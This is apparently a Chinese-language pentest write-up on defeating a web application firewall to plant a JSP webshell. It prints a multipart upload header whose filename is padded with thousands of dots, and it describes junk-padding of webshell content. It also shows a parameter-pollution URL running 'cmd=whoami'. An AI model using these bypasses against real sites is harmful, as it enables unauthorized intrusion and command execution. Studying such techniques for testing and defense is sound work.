前言
在测试项目的时候,网站有WAF,只要输入一些敏感字符就直接封IP 10分钟左右。发现有上传功能,经过不断的测试终于拿到shell。
经过
上传附件,使用burpsuite 抓取数据包
测试上传jsp直接被封IP了,换个IP继续。在文件名利用很多个. 成功上传 jsp。也简单的解析了
代码语言:javascript复制Content-Disposition: form-data; name="file"; filename="1..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................jsp"
Content-Type: application/pdf
当上传shell的时候发现直接被封IP了,冰蝎,哥斯拉,厚着脸皮去白嫖的 webshell 都上传失败。
转念一想,是不是可以继续进行垃圾填充。发现是可以的,成功上传shell。
但是又发现冰蝎,哥斯拉 shell 在连接的时候全部都连接不上,明显又被拦截了。这时候上传一个执行命令的shell,发现执行命令会被直接封IP。
这时候的想法是可不可以用参数污染来绕过,成功执行命令
代码语言:javascript复制http://xxx.cn/2020/12/25/xx.jsp?a=xxx很多的垃圾字符xxx&cmd=whoami
总结
1、文件名使用很多个. 绕过成功上传jsp
2、上传内容使用垃圾字符进行绕过
3、使用参数污染成功执行命令
